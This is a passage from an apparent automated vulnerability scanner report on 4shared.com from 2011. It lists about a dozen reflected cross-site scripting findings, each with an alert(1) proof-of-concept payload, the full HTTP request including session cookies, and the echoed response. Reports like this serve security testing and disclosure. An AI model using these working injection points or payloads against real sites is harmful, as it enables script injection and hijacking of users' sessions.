Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563

Response

HTTP/1.1 404 /login.jsp7c0c7'-alert(1)-'2190480f510
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:42 GMT
Content-Length: 38580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4share
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/login.jsp7c0c7'-alert(1)-'2190480f510',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.96. http://www.4shared.com/m/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9ea5'-alert(1)-'bc481ad250d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mb9ea5'-alert(1)-'bc481ad250d/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_

Response

HTTP/1.1 404 /mb9ea5'-alert(1)-'bc481ad250d/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:50 GMT
Content-Length: 38582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/mb9ea5'-alert(1)-'bc481ad250d/',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

2.97. http://www.4shared.com/m/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/m/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5046"-alert(1)-"c5cf01eb698 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mf5046"-alert(1)-"c5cf01eb698/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_

Response

HTTP/1.1 404 /mf5046"-alert(1)-"c5cf01eb698/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:48 GMT
Content-Length: 38755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/mf5046"-alert(1)-"c5cf01eb698/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

2.98. http://www.4shared.com/premium.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3eb5'-alert(1)-'57b031188b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /premium.jspd3eb5'-alert(1)-'57b031188b4?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /premium.jspd3eb5'-alert(1)-'57b031188b4
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:46 GMT
Content-Length: 38800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/premium.jspd3eb5'-alert(1)-'57b031188b4',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.99. http://www.4shared.com/premium.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d74b"-alert(1)-"9250d38803 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /premium.jsp9d74b"-alert(1)-"9250d38803?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /premium.jsp9d74b"-alert(1)-"9250d38803
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:42 GMT
Content-Length: 38798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/premium.jsp9d74b"-alert(1)-"9250d38803";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.100. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/remindPassword.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4473"-alert(1)-"a9e58964337 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /remindPassword.jspa4473"-alert(1)-"a9e58964337 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /remindPassword.jspa4473"-alert(1)-"a9e58964337
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:03:01 GMT
Content-Length: 38836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/remindPassword.jspa4473"-alert(1)-"a9e58964337";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.101. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/remindPassword.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ad7a'-alert(1)-'9ef5754e82c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /remindPassword.jsp9ad7a'-alert(1)-'9ef5754e82c HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /remindPassword.jsp9ad7a'-alert(1)-'9ef5754e82c
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:03:05 GMT
Content-Length: 38834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/remindPassword.jsp9ad7a'-alert(1)-'9ef5754e82c',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.102. http://www.4shared.com/requestCall.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/requestCall.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c5c1"-alert(1)-"2670472e93d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /requestCall.jsp1c5c1"-alert(1)-"2670472e93d HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /requestCall.jsp1c5c1"-alert(1)-"2670472e93d
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:35 GMT
Content-Length: 38822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/requestCall.jsp1c5c1"-alert(1)-"2670472e93d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.103. http://www.4shared.com/requestCall.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/requestCall.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23010'-alert(1)-'bf6bc28c3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /requestCall.jsp23010'-alert(1)-'bf6bc28c3f HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /requestCall.jsp23010'-alert(1)-'bf6bc28c3f
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:39 GMT
Content-Length: 38817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/requestCall.jsp23010'-alert(1)-'bf6bc28c3f',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.104. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/rest/account/freeSpace

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caf66'-alert(1)-'84c2e73cb5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /restcaf66'-alert(1)-'84c2e73cb5f/account/freeSpace?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /restcaf66'-alert(1)-'84c2e73cb5f/account/freeSpace
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:28 GMT
Content-Length: 38667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/restcaf66'-alert(1)-'84c2e73cb5f/account/freeSpace',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

2.105. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/rest/account/freeSpace

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9e01"-alert(1)-"1f9f4994b83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /resta9e01"-alert(1)-"1f9f4994b83/account/freeSpace?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /resta9e01"-alert(1)-"1f9f4994b83/account/freeSpace
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:26 GMT
Content-Length: 38672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/resta9e01"-alert(1)-"1f9f4994b83/account/freeSpace";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

2.106. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/rest/account/freeSpace

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 357e7'-alert(1)-'2c4f98a63ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rest/account357e7'-alert(1)-'2c4f98a63ac/freeSpace?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /rest/account357e7'-alert(1)-'2c4f98a63ac/freeSpace
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:39 GMT
Content-Length: 38849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
of loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/rest/account357e7'-alert(1)-'2c4f98a63ac/freeSpace',
remember : true

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

2.107. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/rest/account/freeSpace

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f91"-alert(1)-"6aa4867a991 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rest/account22f91"-alert(1)-"6aa4867a991/freeSpace?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /rest/account22f91"-alert(1)-"6aa4867a991/freeSpace
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
